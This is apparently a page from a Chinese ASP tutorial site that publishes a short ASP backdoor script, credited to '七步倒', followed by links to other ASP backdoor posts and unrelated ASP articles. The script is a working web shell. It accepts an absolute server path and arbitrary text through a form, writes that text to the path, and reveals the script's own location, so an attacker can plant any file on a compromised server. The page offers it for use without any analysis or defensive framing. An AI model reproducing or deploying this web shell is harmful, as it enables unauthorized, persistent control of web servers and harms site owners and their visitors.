- <html>
- <head>
- <title>七步倒┈→专用asp后门</title>
- </head>
- </html>
- <%dim objFSO%>
- <%dim fdata%>
- <%dim objCountFile%>
- <%on error resume next%>
- <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
- <%if Trim(request("syfdpath"))<>"" then%>
- <%fdata = request("cyfddata")%>
- <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
- <%objCountFile.Write fdata%>
- <%if err =0 then%>
- <%response.write "<font color=blue>Save Success!</font>"%>
- <%else%>
- <%response.write "<font color=red>Save UnSuccess!</font>"%>
- <%end if%>
- <%err.clear%>
- <%end if%>
- <%objCountFile.Close%>
- <%Set objCountFile=Nothing%>
- <%Set objFSO = Nothing%>
- <%Response.write "<form action='''' method=post>"%>
- <%Response.write "<font color=blue>save file绝对路径:</font>"%>
- <%Response.Write "<input type=text name=syfdpath width=32 size=50>"%>
- <%Response.Write "<br>"%>
- <%Response.write "<font color=red>file of 绝对路径"%>
- <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
- <%Response.write "<br>"%>
- <%Response.write "input:"%>
- <%Response.write "<textarea name=cyfddata cols=80 rows=10
- width=50></textarea>"%>
- <%Response.write "<input type=submit value=save>"%>
- <%Response.write "</form>"%>
- BY:七步倒
七步倒┈→专用asp后门
2019-10-14 11:26七步倒 ASP教程
七步倒┈→专用asp后门
延伸 · 阅读
- 2019-09-29几种另类的ASP后门
- 2019-09-16最小asp后门程序
- 2019-09-02隐蔽的ASP后门 大家可以查看下
精彩推荐
- ASP教程
JScript中遍历Request表单参数集合的方法
这篇文章主要介绍了JScript中遍历Request表单参数集合的方法,本文以遍历Request.QueryString集合为例给出了实现代码,需要的朋友可以参考下...
- ASP教程
asp之基于adodb.stream的文件操作类
asp之基于adodb.stream的文件操作类...
- ASP教程
asp 采集实战代码
最近实在是太流行采集了,本人是不喜欢采集的,但对采集的原理我却很有兴趣进行研究,拿到了网上采集常用函数,对其进行了一番研究,并实战,结果...
- ASP教程
ASP.NET 数据源
数据源 一个 data sourse 控件与数据绑定的控件相互作用,并隐藏了复杂的数据的联编过程。这些是提供数据给 data bound 控件的工具,并且支持如插入,删除...
- ASP教程
asp+javascript实现404页的处理转换
asp+javascript实现404页的处理转换...
- ASP教程
ASP常用函数:getpy()
ASP常用函数:getpy()...
- ASP教程
asp 标记字符串中指定字符变色不区分大小写
今天遇到这种问题,单纯的使用replace函数不行,他会改变原有的字符串的大小写,在网上找到相关的代码,自己备份下...
- ASP教程
asp Access数据备份,还原,压缩类代码
asp Access数据备份,还原,压缩类实现代码,大家可以参考下。...